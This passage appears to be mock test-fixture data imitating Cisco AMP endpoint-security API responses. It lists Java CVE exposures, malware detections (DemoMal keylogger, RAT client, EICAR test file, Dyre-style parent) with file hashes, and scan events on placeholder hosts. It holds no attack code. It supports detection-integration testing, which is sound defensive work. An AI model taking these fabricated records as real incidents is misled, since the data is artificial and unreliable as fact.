Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705105,"start_date":"2021-01-15T10:05:05+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}},"vulnerabilities":[{"name":"Oracle Java(TM) Platform SE","version":"1.7.0:update_10","cve":"CVE-2013-5830","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5830"},{"cve":"CVE-2013-5843","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5843"},{"cve":"CVE-2013-5842","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5842"},{"cve":"CVE-2013-5817","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5817"},{"cve":"CVE-2013-5814","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5814"},{"cve":"CVE-2013-5809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5809"},{"cve":"CVE-2013-5789","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5789"},{"cve":"CVE-2013-5829","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5829"},{"cve":"CVE-2013-5788","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5788"},{"cve":"CVE-2013-5824","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5824"},{"cve":"CVE-2013-5787","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5787"},{"cve":"CVE-2013-5782","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5782"},{"cve":"CVE-2013-2470","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2470"},{"cve":"CVE-2013-2465","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2465"},{"cve":"CVE-2013-2471","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2471"},{"cve":"CVE-2013-2473","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2473"},{"cve":"CVE-2013-2472","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2472"},{"cve":"CVE-2013-2469","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2469"},{"cve":"CVE-2013-2468","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2468"},{"cve":"CVE-2013-2466","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2466"},{"cve":"CVE-2013-2464","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2464"},{"cve":"CVE-2013-2463","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2463"},{"cve":"CVE-2013-2459","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2459"},{"cve":"CVE-2013-2428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2428"},{"cve":"CVE-2013-2420","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2420"},{"cve":"CVE-2013-2434","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2434"},{"cve":"CVE-2013-2384","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2384"},{"cve":"CVE-2013-1518","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1518"},{"cve":"CVE-2013-1537","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1537"},{"cve":"CVE-2013-2440","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2440"},{"cve":"CVE-2013-1557","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1557"},{"cve":"CVE-2013-1558","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1558"},{"cve":"CVE-2013-2435","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2435"},{"cve":"CVE-2013-2432","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2432"},{"cve":"CVE-2013-1569","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1569"},{"cve":"CVE-2013-2431","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2431"},{"cve":"CVE-2013-2383","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2383"},{"cve":"CVE-2013-2427","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2427"},{"cve":"CVE-2013-2425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2425"},{"cve":"CVE-2013-2422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2422"},{"cve":"CVE-2013-2414","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2414"},{"cve":"CVE-2013-0809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0809"},{"cve":"CVE-2013-1493","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493"},{"cve":"CVE-2013-1480","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1480"},{"cve":"CVE-2013-0428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0428"},{"cve":"CVE-2013-0437","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0437"},{"cve":"CVE-2013-0441","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0441"},{"cve":"CVE-2013-0442","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0442"},{"cve":"CVE-2013-0445","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0445"},{"cve":"CVE-2013-0450","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0450"},{"cve":"CVE-2013-1476","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1476"},{"cve":"CVE-2013-1478","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1478"},{"cve":"CVE-2013-1479","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1479"},{"cve":"CVE-2013-1484","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1484"},{"cve":"CVE-2013-0426","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0426"},{"cve":"CVE-2013-1486","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1486"},{"cve":"CVE-2013-1487","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1487"},{"cve":"CVE-2013-0425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0425"},{"cve":"CVE-2013-0422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422"},{"cve":"CVE-2013-0446","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0446"},{"cve":"CVE-2013-1475","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1475"},{"cve":"CVE-2013-2460","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2460"},{"cve":"CVE-2013-5838","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5838"},{"cve":"CVE-2013-5777","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5777"},{"cve":"CVE-2013-5810","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5810"},{"cve":"CVE-2013-5832","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5832"},{"cve":"CVE-2013-5806","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5806"},{"cve":"CVE-2013-5805","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5805"},{"cve":"CVE-2013-5850","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5850"},{"cve":"CVE-2013-5844","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5844"},{"cve":"CVE-2013-5846","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5846"},{"cve":"CVE-2013-2462","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2462"},{"cve":"CVE-2013-2436","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2436"},{"cve":"CVE-2013-2426","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2426"},{"cve":"CVE-2013-2421","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2421"},{"cve":"CVE-2013-2445","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2445"},{"cve":"CVE-2013-5852","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5852"},{"cve":"CVE-2013-2448","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2448"},{"cve":"CVE-2013-2394","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2394"},{"cve":"CVE-2013-2429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2429"},{"cve":"CVE-2013-2430","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2430"},{"cve":"CVE-2013-1563","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1563"},{"cve":"CVE-2013-0429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0429"},{"cve":"CVE-2013-0444","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0444"},{"cve":"CVE-2013-0419","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0419"},{"cve":"CVE-2013-0423","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0423"},{"cve":"CVE-2013-5775","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5775"},{"cve":"CVE-2013-5802","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5802"},{"cve":"CVE-2013-2442","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2442"},{"cve":"CVE-2013-2461","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2461"},{"cve":"CVE-2013-0351","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0351"},{"cve":"CVE-2013-2439","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2439"},{"cve":"CVE-2013-0430","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0430"},{"cve":"CVE-2013-3829","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3829"},{"cve":"CVE-2013-5783","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5783"},{"cve":"CVE-2013-5804","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5804"},{"cve":"CVE-2013-5812","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5812"},{"cve":"CVE-2013-2407","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2407"},{"cve":"CVE-2013-0432","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0432"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255807366103000,"timestamp":1610705095,"timestamp_nanoseconds":45000000,"date":"2021-01-15T10:04:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255807366103064","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255777301332000,"timestamp":1610705088,"timestamp_nanoseconds":259000000,"date":"2021-01-15T10:04:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255777301331991","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832267006136549000,"timestamp":1610705083,"timestamp_nanoseconds":294000000,"date":"2021-01-15T10:04:43+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox","clean":true,"scanned_files":97,"scanned_processes":0,"scanned_paths":11,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266988956680000,"timestamp":1610705079,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:04:39+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255730056692000,"timestamp":1610705077,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:04:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255730056691734","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255674222117000,"timestamp":1610705064,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:04:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255674222116885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055368265531000,"timestamp":1610705053,"timestamp_nanoseconds":870000000,"date":"2021-01-15T10:04:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055368265531411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255622682509000,"timestamp":1610705052,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:04:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255622682509332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055359675597000,"timestamp":1610705051,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:04:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055359675596818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055355380630000,"timestamp":1610705050,"timestamp_nanoseconds":667000000,"date":"2021-01-15T10:04:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055355380629521","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1ds","file_path":"\\\\?\\C:\\WINDOWS\\system32\\config\\systemprofile\\Desktop\\s1ds","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662224","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662223","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":885000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat 